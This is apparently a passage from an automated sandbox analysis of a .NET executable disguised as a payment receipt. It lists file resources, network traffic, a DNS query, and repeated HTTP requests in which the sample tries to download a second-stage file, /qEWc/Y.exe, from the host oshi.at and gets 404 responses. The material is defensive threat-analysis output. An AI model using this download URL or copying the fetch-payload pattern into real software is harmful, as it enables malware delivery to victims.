                                .reloc0xe0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xc1600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2675891181988743
                                RT_ICON0xd2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5106382978723404
                                RT_GROUP_ICON0xd6700x22data0.9705882352941176
                                RT_VERSION0xd6940x30cdata0.42948717948717946
                                RT_MANIFEST0xd9a00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                DLLImport
                                mscoree.dll_CorExeMain
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 1, 2023 08:33:25.944758892 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:25.944788933 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:25.944889069 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.003115892 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.003154039 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:26.567749977 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:26.567854881 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.586040020 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.586059093 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:26.586563110 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:26.632693052 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.745829105 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:26.786454916 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:47.951706886 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:47.951741934 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:47.951821089 CET443497045.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:47.951823950 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:47.951857090 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:47.968864918 CET49704443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:52.980119944 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:52.980159998 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:52.980253935 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:52.980638027 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:52.980652094 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:53.531002045 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:53.561844110 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:53.561873913 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:54.708676100 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:54.708750010 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:54.708834887 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:54.708868027 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:54.708904028 CET443497125.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:54.708970070 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:54.709424973 CET49712443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:59.711940050 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:59.712001085 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:33:59.712209940 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:59.714448929 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:33:59.714476109 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:00.271691084 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:00.280430079 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:00.280459881 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:19.333050966 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:19.333066940 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:19.333125114 CET443497135.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:19.333208084 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:19.333208084 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:19.334352016 CET49713443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:24.336891890 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:24.336966991 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:24.337038040 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:24.337435007 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:24.337447882 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:24.894578934 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:24.896162033 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:24.896192074 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:28.445126057 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:28.445147991 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:28.445200920 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:28.445211887 CET443497155.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:28.445251942 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:28.446054935 CET49715443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:33.684163094 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:33.684206009 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:33.684298992 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:33.684612036 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:33.684632063 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:34.245634079 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:34.282165051 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:34.282188892 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:35.188360929 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:35.188384056 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:35.188448906 CET443497165.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:35.188551903 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:35.188682079 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:35.189121962 CET49716443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:40.197427988 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:40.197477102 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:40.197690964 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:40.198445082 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:40.198457956 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:40.755918026 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:40.757723093 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:40.757750034 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:41.736715078 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:41.736764908 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:41.736952066 CET443497175.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:41.736952066 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:41.737086058 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:41.738483906 CET49717443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:46.743264914 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:46.743314028 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:46.743413925 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:46.743843079 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:46.743859053 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:47.306004047 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:47.324311972 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:47.324343920 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:52.025437117 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:52.025506973 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:52.025645018 CET443497225.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:52.025726080 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:52.025726080 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:52.167471886 CET49722443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:57.180880070 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:57.180917025 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:57.181148052 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:57.181843996 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:57.181864977 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:57.756978989 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:57.758862019 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:57.758893967 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:58.694940090 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:58.695004940 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:58.695146084 CET443497235.253.86.15192.168.2.7
                                Nov 1, 2023 08:34:58.695245028 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:58.695346117 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:34:58.695813894 CET49723443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:03.713337898 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:03.713409901 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:03.713500023 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:03.714092016 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:03.714113951 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:04.281816959 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:04.283826113 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:04.283878088 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:11.229195118 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:11.229221106 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:11.229307890 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:11.229336977 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:11.230149984 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:11.230194092 CET443497245.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:11.230262995 CET49724443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.243134975 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.243168116 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:16.243230104 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.243798018 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.243808985 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:16.793459892 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:16.793600082 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.797863007 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.797869921 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:16.798150063 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:16.799995899 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:16.846443892 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:25.006942987 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:25.006970882 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:25.007028103 CET443497255.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:25.007071972 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:25.007132053 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:25.007879019 CET49725443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:30.026468039 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:30.026520967 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:30.026624918 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:30.027004957 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:30.027017117 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:30.590543032 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:30.592395067 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:30.592430115 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:40.741117954 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:40.741148949 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:40.741219997 CET443497265.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:40.741305113 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:40.741332054 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:40.742145061 CET49726443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:45.752346992 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:45.752386093 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:45.752460003 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:45.752893925 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:45.752908945 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:46.333641052 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:46.335510969 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:46.335539103 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:59.327383041 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:59.327423096 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:59.327513933 CET443497275.253.86.15192.168.2.7
                                Nov 1, 2023 08:35:59.327649117 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:59.327649117 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:35:59.401082993 CET49727443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:04.416518927 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:04.416575909 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:04.416773081 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:04.418378115 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:04.418390036 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:04.970748901 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:04.973490000 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:04.973520994 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:20.581563950 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:20.581599951 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:20.581681967 CET443497285.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:20.581703901 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:20.581789017 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:20.582173109 CET49728443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:25.587172985 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:25.587285042 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:25.587477922 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:25.587824106 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:25.587855101 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:26.135293961 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:26.138261080 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:26.138299942 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:27.333345890 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:27.333410025 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:27.333483934 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:27.333518028 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:27.333563089 CET443497295.253.86.15192.168.2.7
                                Nov 1, 2023 08:36:27.333621979 CET49729443192.168.2.75.253.86.15
                                Nov 1, 2023 08:36:27.333956957 CET49729443192.168.2.75.253.86.15
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 1, 2023 08:33:25.750605106 CET5739153192.168.2.71.1.1.1
                                Nov 1, 2023 08:33:25.932090044 CET53573911.1.1.1192.168.2.7
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 1, 2023 08:33:25.750605106 CET192.168.2.71.1.1.10x1a45Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 1, 2023 08:33:25.932090044 CET1.1.1.1192.168.2.70x1a45No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                • oshi.at
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.7497045.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:33:26 UTC0OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                Connection: Keep-Alive
                                2023-11-01 07:33:47 UTC0INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:33:47 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:33:47 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.7497125.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:33:53 UTC2OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:33:54 UTC2INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:33:54 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:33:54 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                10192.168.2.7497265.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:35:30 UTC20OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:35:40 UTC20INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:35:40 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:35:40 UTC20INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                11192.168.2.7497275.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:35:46 UTC22OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:35:59 UTC22INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:35:59 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:35:59 UTC22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                12192.168.2.7497285.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:36:04 UTC24OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:36:20 UTC24INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:36:20 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:36:20 UTC24INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                13192.168.2.7497295.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:36:26 UTC26OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:36:27 UTC26INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:36:27 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
